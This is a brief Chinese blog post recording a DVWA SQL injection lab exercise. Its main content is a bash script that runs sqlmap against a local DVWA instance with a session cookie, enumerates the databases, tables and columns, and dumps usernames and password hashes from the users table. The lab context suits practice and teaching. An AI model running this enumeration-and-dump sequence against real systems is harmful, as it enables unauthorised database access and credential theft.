DVWA-SQL Injection

image

image
后面就是在对应位置显示表名什么的一步步猜下去

中级文本框变成下拉框
SI

或者上脚本用sqlmap

!/bin/bash

TARGET_URL="http://192.168.0.103:8080/vulnerabilities/sqli/"
PHPSESSID="orlatscvk7pkupj0bqjhknvp41"
REQUEST_FILE="/home/gaoyin/Desktop/sqli_high.txt"

sed -i "s/Cookie:.*/Cookie: PHPSESSID=$PHPSESSID; security=high/" "$REQUEST_FILE"

echo "[*] 检测注入点"
sqlmap -r "$REQUEST_FILE" --second-url="$TARGET_URL" --batch

echo "[*] 枚举所有数据库"
sqlmap -r "$REQUEST_FILE" --second-url="$TARGET_URL" --batch --dbs

echo "[*] 枚举 dvwa 库的表"
sqlmap -r "$REQUEST_FILE" --second-url="$TARGET_URL" --batch -D dvwa --tables

echo "[*] 枚举 users 表的列"
sqlmap -r "$REQUEST_FILE" --second-url="$TARGET_URL" --batch -D dvwa -T users --columns

echo "[*] 导出 user,password"
sqlmap -r "$REQUEST_FILE" --second-url="$TARGET_URL" --batch -D dvwa -T users -C user,password --dump

echo "[+] 完成"

posted @ 2026-06-07 11:06  CCLluvia  阅读(14)  评论(0)    收藏  举报